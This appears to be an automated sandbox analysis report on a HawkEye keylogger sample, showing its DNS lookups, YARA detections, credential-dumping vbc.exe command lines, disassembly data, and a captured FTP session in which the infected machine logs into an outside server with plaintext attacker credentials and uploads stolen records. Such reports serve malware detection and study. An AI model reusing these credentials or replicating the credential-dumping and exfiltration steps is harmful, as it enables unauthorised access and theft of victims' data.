                                                                                                                                                  Feb 14, 2022 09:43:52.967884064 CET53621768.8.8.8192.168.2.5
                                                                                                                                                  Feb 14, 2022 09:44:14.983257055 CET6015153192.168.2.58.8.8.8
                                                                                                                                                  Feb 14, 2022 09:44:15.022200108 CET53601518.8.8.8192.168.2.5

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Feb 14, 2022 09:43:52.948479891 CET192.168.2.58.8.8.80xf48aStandard query (0)168.98.4.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                                                  Feb 14, 2022 09:44:14.983257055 CET192.168.2.58.8.8.80x19b9Standard query (0)ftp.manchutimefashion.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Feb 14, 2022 09:43:52.967884064 CET8.8.8.8192.168.2.50xf48aName error (3)168.98.4.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                                                                  Feb 14, 2022 09:44:15.022200108 CET8.8.8.8192.168.2.50x19b9No error (0)ftp.manchutimefashion.com66.70.204.222A (IP address)IN (0x0001)

                                                                                                                                                  FTP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                  Feb 14, 2022 09:44:15.240664005 CET214977066.70.204.222192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.
                                                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21.
                                                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 12:44. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                                                  Feb 14, 2022 09:44:15.241769075 CET4977021192.168.2.566.70.204.222USER Elooggs2020@manchutimefashion.com
                                                                                                                                                  Feb 14, 2022 09:44:15.341878891 CET214977066.70.204.222192.168.2.5331 User Elooggs2020@manchutimefashion.com OK. Password required
                                                                                                                                                  Feb 14, 2022 09:44:15.342132092 CET4977021192.168.2.566.70.204.222PASS [r2W$.jaD*?p
                                                                                                                                                  Feb 14, 2022 09:44:15.456659079 CET214977066.70.204.222192.168.2.5230 OK. Current restricted directory is /
                                                                                                                                                  Feb 14, 2022 09:44:15.557804108 CET214977066.70.204.222192.168.2.5504 Unknown command
                                                                                                                                                  Feb 14, 2022 09:44:15.558413029 CET4977021192.168.2.566.70.204.222PWD
                                                                                                                                                  Feb 14, 2022 09:44:15.658602953 CET214977066.70.204.222192.168.2.5257 "/" is your current location
                                                                                                                                                  Feb 14, 2022 09:44:15.658891916 CET4977021192.168.2.566.70.204.222TYPE I
                                                                                                                                                  Feb 14, 2022 09:44:15.758956909 CET214977066.70.204.222192.168.2.5200 TYPE is now 8-bit binary
                                                                                                                                                  Feb 14, 2022 09:44:15.759217978 CET4977021192.168.2.566.70.204.222PASV
                                                                                                                                                  Feb 14, 2022 09:44:15.859291077 CET214977066.70.204.222192.168.2.5227 Entering Passive Mode (66,70,204,222,226,92)
                                                                                                                                                  Feb 14, 2022 09:44:15.960773945 CET4977021192.168.2.566.70.204.222STOR HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
                                                                                                                                                  Feb 14, 2022 09:44:16.060944080 CET214977066.70.204.222192.168.2.5150 Accepted data connection
                                                                                                                                                  Feb 14, 2022 09:44:16.164796114 CET214977066.70.204.222192.168.2.5226-File successfully transferred
                                                                                                                                                  226-File successfully transferred226 0.104 seconds (measured here), 14.36 Kbytes per second

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:09:43:20
                                                                                                                                                  Start date:14/02/2022
                                                                                                                                                  Path:C:\Users\user\Desktop\tDb0ggawON.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\tDb0ggawON.exe"
                                                                                                                                                  Imagebase:0xfb0000
                                                                                                                                                  File size:1244160 bytes
                                                                                                                                                  MD5 hash:91DE6EFC69676A4DD4CED5E2111AB489
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:09:43:42
                                                                                                                                                  Start date:14/02/2022
                                                                                                                                                  Path:C:\Users\user\Desktop\tDb0ggawON.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\Desktop\tDb0ggawON.exe
                                                                                                                                                  Imagebase:0xba0000
                                                                                                                                                  File size:1244160 bytes
                                                                                                                                                  MD5 hash:91DE6EFC69676A4DD4CED5E2111AB489
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000B.00000002.520764467.0000000008080000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Target ID:14
                                                                                                                                                  Start time:09:43:59
                                                                                                                                                  Start date:14/02/2022
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1171592 bytes
                                                                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.336146363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Target ID:15
                                                                                                                                                  Start time:09:44:00
                                                                                                                                                  Start date:14/02/2022
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1171592 bytes
                                                                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.337820875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:12.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:2.5%
                                                                                                                                                    Total number of Nodes:120
                                                                                                                                                    Total number of Limit Nodes:12
                                                                                                                                                    execution_graph 18724 9f17470 18725 9f175fb 18724->18725 18726 9f17496 18724->18726 18726->18725 18729 9f17740 PostMessageW 18726->18729 18731 9f17748 PostMessageW 18726->18731 18730 9f177f5 18729->18730 18730->18726 18732 9f177f5 18731->18732 18732->18726 18733 5a46420 18734 5a46437 18733->18734 18737 5a44e3c 18734->18737 18736 5a46454 18738 5a44e47 18737->18738 18741 5a44e6c 18738->18741 18740 5a465dd 18740->18736 18742 5a44e77 18741->18742 18745 5a44e9c 18742->18745 18744 5a466ba 18744->18740 18746 5a44ea7 18745->18746 18749 5a46700 18746->18749 18748 5a46bb2 18748->18744 18751 5a4670b 18749->18751 18750 5a46ef4 18750->18748 18751->18750 18753 5a4b310 18751->18753 18754 5a4b31f 18753->18754 18755 5a4b2c2 18753->18755 18756 5a4b365 18754->18756 18759 5a4b4d0 18754->18759 18763 5a4b4bf 18754->18763 18755->18750 18756->18750 18760 5a4b4dd 18759->18760 18762 5a4b517 18760->18762 18767 5a49f4c 18760->18767 18762->18756 18764 5a4b4dd 18763->18764 18765 5a4b517 18764->18765 18766 5a49f4c 4 API calls 18764->18766 18765->18756 18766->18765 18768 5a49f57 18767->18768 18769 5a4c280 18768->18769 18771 5a4a010 18768->18771 18772 5a4a01b 18771->18772 18773 5a46700 4 API calls 18772->18773 18774 5a4c2ef 18773->18774 18778 5a4e058 18774->18778 18783 5a4e070 18774->18783 18775 5a4c328 18775->18769 18779 5a4e070 18778->18779 18780 5a4e0ad 18779->18780 18789 5a4e560 18779->18789 18792 5a4e570 18779->18792 18780->18775 18785 5a4e0a1 18783->18785 18786 5a4e0ed 18783->18786 18784 5a4e0ad 18784->18775 18785->18784 18787 5a4e560 4 API calls 18785->18787 18788 5a4e570 4 API calls 18785->18788 18786->18775 18787->18786 18788->18786 18790 5a491a8 LoadLibraryExW GetModuleHandleW GetModuleHandleW GetModuleHandleW 18789->18790 18791 5a4e579 18790->18791 18791->18780 18793 5a491a8 LoadLibraryExW GetModuleHandleW GetModuleHandleW GetModuleHandleW 18792->18793 18794 5a4e579 18792->18794 18793->18794 18794->18780 18833 5a490b0 18834 5a490bf 18833->18834 18836 5a491a8 18833->18836 18837 5a491bb 18836->18837 18839 5a491d3 18837->18839 18845 5a494cc 18837->18845 18853 5a49478 18837->18853 18857 5a49468 18837->18857 18838 5a491cb 18838->18839 18840 5a493ed GetModuleHandleW 18838->18840 18839->18834 18841 5a4942c 18840->18841 18841->18834 18846 5a49471 18845->18846 18851 5a494cf 18845->18851 18847 5a49415 GetModuleHandleW 18846->18847 18849 5a49473 18846->18849 18848 5a4942c 18847->18848 18848->18838 18850 5a494b1 18849->18850 18864 5a484d0 18849->18864 18850->18838 18854 5a4948c 18853->18854 18855 5a484d0 LoadLibraryExW 18854->18855 18856 5a494b1 18854->18856 18855->18856 18856->18838 18858 5a49471 18857->18858 18859 5a49415 GetModuleHandleW 18858->18859 18861 5a49473 18858->18861 18860 5a4942c 18859->18860 18860->18838 18862 5a484d0 LoadLibraryExW 18861->18862 18863 5a494b1 18861->18863 18862->18863 18863->18838 18865 5a49698 LoadLibraryExW 18864->18865 18867 5a49754 18865->18867 18867->18850 18872 5a4b810 DuplicateHandle 18873 5a4b8ed 18872->18873 18795 5a4b5e8 GetCurrentProcess 18796 5a4b662 GetCurrentThread 18795->18796 18797 5a4b65b 18795->18797 18798 5a4b69f GetCurrentProcess 18796->18798 18799 5a4b698 18796->18799 18797->18796 18802 5a4b6d5 18798->18802 18799->18798 18800 5a4b6fd GetCurrentThreadId 18801 5a4b72e 18800->18801 18802->18800 18803 17fbfb0 18805 17fbfcc 18803->18805 18804 17fc07e 18805->18804 18808 5a439f8 18805->18808 18812 5a43a08 18805->18812 18809 5a43a08 18808->18809 18810 5a43a25 18809->18810 18816 5a43af0 18809->18816 18810->18805 18813 5a43a1a 18812->18813 18814 5a43a25 18813->18814 18815 5a43af0 CreateActCtxA 18813->18815 18814->18805 18815->18814 18817 5a43b15 18816->18817 18821 5a43fe0 18817->18821 18825 5a43ff0 18817->18825 18823 5a43ff0 18821->18823 18822 5a440f4 18822->18822 18823->18822 18829 5a43c10 18823->18829 18827 5a44017 18825->18827 18826 5a440f4 18826->18826 18827->18826 18828 5a43c10 CreateActCtxA 18827->18828 18828->18826 18830 5a450a8 CreateActCtxA 18829->18830 18832 5a451ae 18830->18832 18832->18832 18868 17f7ed0 18869 17f7f1d VirtualProtect 18868->18869 18871 17f7f89 18869->18871

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 017F3031 Relevance: 9.0, Strings: 7, Instructions: 210COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 17f3031-17f3040 2 17f3053-17f3058 0->2 3 17f3042-17f3048 0->3 4 17f305a-17f3075 2->4 3->4 5 17f304a-17f3051 3->5 6 17f307c-17f3099 4->6 7 17f3077 4->7 5->2 9 17f30a1 6->9 7->6 10 17f30a8-17f30c4 9->10 11 17f30cd-17f30ce 10->11 12 17f30c6 10->12 14 17f30d3-17f30e5 11->14 28 17f34c7-17f34ce 11->28 12->9 13 17f325e-17f3276 12->13 12->14 15 17f3431-17f3448 12->15 16 17f310f-17f3124 12->16 17 17f332f-17f3346 12->17 18 17f344d-17f3451 12->18 19 17f320d-17f3219 12->19 20 17f318a-17f31aa 12->20 21 17f330a-17f332a 12->21 22 17f3407-17f342c 12->22 23 17f30e7-17f30f9 12->23 24 17f3126-17f3144 12->24 25 17f3365-17f337c 12->25 26 17f3244-17f3259 12->26 27 17f3381-17f338a 12->27 31 17f327d-17f328f 13->31 32 17f3278 13->32 14->10 15->10 16->10 46 17f3348 call 17f3691 17->46 47 17f3348 call 17f36a0 17->47 35 17f3464-17f346b 18->35 36 17f3453-17f3462 18->36 29 17f321b 19->29 30 17f3220-17f323f 19->30 20->10 21->10 22->10 23->10 24->10 25->10 26->10 33 17f339d-17f33a4 27->33 34 17f338c-17f339b 27->34 29->30 30->10 31->10 32->31 38 17f33ab-17f33b1 33->38 34->38 39 17f3472-17f3478 35->39 36->39 38->10 39->10 41 17f334e-17f3360 41->10 46->41 47->41
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
                                                                                                                                                    • API String ID: 0-2581025826
                                                                                                                                                    • Opcode ID: 853775fb73bc08a5f85d27c27940119a844d09408eab5b160acd7216828d8467
                                                                                                                                                    • Instruction ID: c7de6f8c468fcd31102db0638d78033de05399c6255f842b3461ca206521585c
                                                                                                                                                    • Opcode Fuzzy Hash: 853775fb73bc08a5f85d27c27940119a844d09408eab5b160acd7216828d8467
                                                                                                                                                    • Instruction Fuzzy Hash: 93912A74E1520ADFCB08CFA5D8808AEFFB2FF89301B54946AD516AB355D7349A42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F3050 Relevance: 9.0, Strings: 7, Instructions: 202COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 48 17f3050-17f3075 51 17f307c-17f3099 48->51 52 17f3077 48->52 53 17f30a1 51->53 52->51 54 17f30a8-17f30c4 53->54 55 17f30cd-17f30ce 54->55 56 17f30c6 54->56 58 17f30d3-17f30e5 55->58 72 17f34c7-17f34ce 55->72 56->53 57 17f325e-17f3276 56->57 56->58 59 17f3431-17f3448 56->59 60 17f310f-17f3124 56->60 61 17f332f-17f3346 56->61 62 17f344d-17f3451 56->62 63 17f320d-17f3219 56->63 64 17f318a-17f31aa 56->64 65 17f330a-17f332a 56->65 66 17f3407-17f342c 56->66 67 17f30e7-17f30f9 56->67 68 17f3126-17f3144 56->68 69 17f3365-17f337c 56->69 70 17f3244-17f3259 56->70 71 17f3381-17f338a 56->71 75 17f327d-17f328f 57->75 76 17f3278 57->76 58->54 59->54 60->54 90 17f3348 call 17f3691 61->90 91 17f3348 call 17f36a0 61->91 79 17f3464-17f346b 62->79 80 17f3453-17f3462 62->80 73 17f321b 63->73 74 17f3220-17f323f 63->74 64->54 65->54 66->54 67->54 68->54 69->54 70->54 77 17f339d-17f33a4 71->77 78 17f338c-17f339b 71->78 73->74 74->54 75->54 76->75 82 17f33ab-17f33b1 77->82 78->82 83 17f3472-17f3478 79->83 80->83 82->54 83->54 85 17f334e-17f3360 85->54 90->85 91->85
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
                                                                                                                                                    • API String ID: 0-2581025826
                                                                                                                                                    • Opcode ID: 9b3a0c8a81b80335c74628321277ce6e78e3521562929f6c61b21ea46e821844
                                                                                                                                                    • Instruction ID: 49111ae1fa051fd797a43d02912eed758cb5063b756ad4e7707a902d17a1a6c3
                                                                                                                                                    • Opcode Fuzzy Hash: 9b3a0c8a81b80335c74628321277ce6e78e3521562929f6c61b21ea46e821844
                                                                                                                                                    • Instruction Fuzzy Hash: 44911874E1520ADFCB08CFA5D9808AEFBB2FF89341F54946AD516AB314D7349A42CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F3149 Relevance: 8.9, Strings: 7, Instructions: 172COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
